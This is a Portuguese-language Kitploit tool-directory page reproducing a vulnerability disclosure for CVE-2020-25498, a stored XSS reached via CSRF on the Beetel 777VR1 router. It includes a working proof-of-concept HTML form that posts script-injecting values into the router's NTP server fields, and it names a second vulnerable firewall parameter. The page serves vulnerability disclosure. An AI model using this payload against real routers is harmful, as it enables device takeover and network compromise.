Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-25498 — # XSS Armazenado via CSRF no Roteador Beetel 777VR1 | Kitploit
Ferramentas/GitHubGitHub/the-girl-who-lived/cve-2020-25498
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

# XSS Armazenado via CSRF no Roteador Beetel 777VR1

Ver Repositório
33há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-25498: XSS Armazenado via CSRF no Roteador Beetel 777VR1

Descrição da Vulnerabilidade

Foi identificado que o endpoint vulnerável não possui validação de entrada no lado do servidor e não possui filtragem no lado do cliente para qualquer injeção de script malicioso. Um atacante pode usar esta vulnerabilidade para injetar script malicioso no endpoint e o script é ativado sempre que um usuário abre o endpoint vulnerável. O atacante pode enviar uma URL maliciosa com payload de requisição POST para executar XSS no módulo de administração via CSRF para assumir o controle do dispositivo e, finalmente, assumir o controle da rede.

Pesquisadora: Sayli Ambure (https://twitter.com/sayli_ambure)

Link MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

Exploit de Prova de Conceito:

Código HTML CSRF:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. Nome do Servidor NTP no módulo de configuração de Hora do Sistema

Parâmetro: Nome do servidor

Vídeo de Prova de Conceito:

2. Endpoint de Filtro de URL no módulo de Firewall

Parâmetro: Palavra-chave

Vídeo de Prova de Conceito:

Baixar ferramenta